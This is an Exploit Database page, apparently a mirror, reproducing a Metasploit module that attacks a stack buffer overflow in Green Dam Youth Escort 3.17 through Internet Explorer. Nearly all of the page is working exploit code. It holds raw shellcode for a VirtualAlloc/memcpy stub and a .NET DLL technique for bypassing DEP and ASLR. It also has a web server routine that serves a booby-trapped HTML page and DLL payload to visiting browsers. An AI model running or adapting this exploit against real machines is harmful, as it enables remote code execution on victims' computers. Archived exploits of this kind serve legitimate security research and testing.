Green Dam – URL Processing Buffer Overflow (Metasploit)

• Exploit Database
• 110 阅读

• 作者： Metasploit
  日期： 2010-03-10
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16536/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162

  ## # $Id: greendam_url.rb 8762 2010-03-10 05:58:01Z jduck $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   ## # greendam_url.rb # # Green Dam URL Processing Buffer Overflow exploit for the Metasploit Framework # # Green Dam Youth Escort 3.17 successfully exploited on the following platforms: #- Internet Explorer 6, Windows XP SP2 #- Internet Explorer 7, Windows XP SP3 #- Internet Explorer 7, Windows Vista SP1 # # .NET binary is used to bypass DEP and ASLR # # Trancer # http://www.rec-sec.com ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking   include Msf::Exploit::Remote::HttpServer::HTML   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Green Dam URL Processing Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a stack-based buffer overflow in Green Dam Youth Escort version 3.17 in the way it handles overly long URLs. By setting an overly long URL, an attacker can overrun a buffer and execute arbitrary code. This module uses the .NET DLL memory technique by Alexander Sotirov and Mark Dowd and should bypass DEP, NX and ASLR. }, &apos;License&apos;=> MSF_LICENSE, &apos;Author&apos; => [ &apos;Trancer <mtrancer[at]gmail.com>&apos; ], &apos;Version&apos;=> &apos;$Revision: 8762 $&apos;, &apos;References&apos; => [ [&apos;OSVDB&apos;, &apos;55126&apos;], [&apos;URL&apos;, &apos;http://www.cse.umich.edu/~jhalderm/pub/gd/&apos;], # Analysis of the Green Dam Censorware System [&apos;URL&apos;, &apos;http://www.milw0rm.com/exploits/8938&apos;], # Original exploit by seer[N.N.U] [&apos;URL&apos;, &apos;http://taossa.com/archive/bh08sotirovdowd.pdf&apos;], # .NET DLL memory technique ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;process&apos;, }, &apos;Payload&apos;=> { &apos;Space&apos;=> 1000, &apos;BadChars&apos; => "\x00", &apos;Compat&apos; => { &apos;ConnectionType&apos; => &apos;-find&apos;, }, &apos;StackAdjustment&apos; => -3500,   # Temporary stub virtualalloc() + memcpy() payload to RWX page &apos;PrependEncoder&apos; => "\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c"+ "\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32"+ "\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07"+ "\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24"+ "\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8"+ "\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64"+ "\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x54"+ "\xca\xaf\x91\xff\xd6\x6a\x40\x5e\x56\xc1\xe6\x06\x56\xc1\xe6\x08"+ "\x56\x6a\x00\xff\xd0\x89\xc3\xeb\x0d\x5e\x89\xdf\xb9\xe8\x03\x00"+ "\x00\xfc\xf3\xa4\xff\xe3\xe8\xee\xff\xff\xff" }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0&apos;, { }], ], &apos;DisclosureDate&apos; => &apos;Jun 11 2009&apos;, &apos;DefaultTarget&apos;=> 0)) end   def on_request_uri(cli, request)   ibase = 0x24240000 vaddr = ibase + 0x2065   if (request.uri.match(/\.dll$/i))   print_status("Sending DLL to #{cli.peerhost}:#{cli.peerport}...")   return if ((p = regenerate_payload(cli)) == nil)   # First entry points to the table of pointers vtable= [ vaddr + 4 ].pack("V") cbase = ibase + 0x2065 + (256 * 4)   # Build a function table 255.times { vtable << [cbase].pack("V") }   # Append the shellcode vtable << p.encoded send_response( cli, Msf::Util::EXE.to_dotnetmem(ibase, vtable), { &apos;Content-Type&apos; => &apos;application/x-msdownload&apos;, &apos;Connection&apos; => &apos;close&apos;, &apos;Pragma&apos; => &apos;no-cache&apos; } ) return end   print_status("Sending HTML to #{cli.peerhost}:#{cli.peerport}...")   j_function = rand_text_alpha(rand(100)+1) j_url = rand_text_alpha(rand(100)+1) j_counter = rand_text_alpha(rand(30)+2)   if ("/" == get_resource[-1,1]) dll_uri = get_resource[0, get_resource.length - 1] else dll_uri = get_resource end dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"   html = %Q|<html> <head> <script language="javascript"> function #{j_function}() { var #{j_url}=&apos;&apos;; for(var #{j_counter}=1;#{j_counter}<=2035;#{j_counter}++) #{j_url}+=&apos;$&apos;;   window.location=#{j_url}+&apos;.html&apos;; } </script> </head> <body onload="#{j_function}()"> <object classid="#{dll_uri}#GenericControl"> <object> </body> </html> |   # Transmit the compressed response to the client send_response(cli, html, { &apos;Content-Type&apos; => &apos;text/html&apos; })   # Handle the payload handler(cli) end end